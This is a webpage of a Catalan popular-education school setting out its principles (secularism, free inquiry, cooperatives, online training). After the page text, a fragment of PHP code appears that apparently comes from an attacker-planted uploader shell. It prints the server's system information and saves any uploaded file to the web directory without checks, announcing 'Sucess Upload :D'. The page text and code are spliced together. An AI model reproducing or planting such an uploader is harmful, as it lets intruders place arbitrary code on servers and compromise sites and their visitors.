• Apostem per un mètode docent basat en la crítica
  racional,la proscripció dels apriorismes i dels dogmes
 • Som una escola militant, qualificada,
  generadora d'idees, eficient
 • Formem en l’educació popular
  per a fer camí amb l’escola
 • Donem valor a les associacions
  i a les cooperatives com a actors socials de progrés
 • Concebim la formació activa
  com a garantia de creixement i progressió personal
 • Innovem en la formació
  i l'acompanyament de les persones
 • Creiem que compartint
  coneixement, construïm ciutadania
 • Apostem pels principis de laïcitat,
  progrés, lliure examen i llibertat de càtedra
 • Creiem en el respecte
  al desenvolupament individual de l’aprenentatge
 • Creiem en la laïcitat
  com a expressió del relativisme de totes les idees
 • Apostem pel dret individual
  i col·lectiu al lliure examen de totes les qüestions
Formació on-line: una eina per a cada necessitat

Campus Virtual


 

 

Uname:".php_uname()."
"; echo ''; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo"

Sucess Upload :D ==> $userfile_name

"; } } else{ echo'


'; } echo ''; } ?>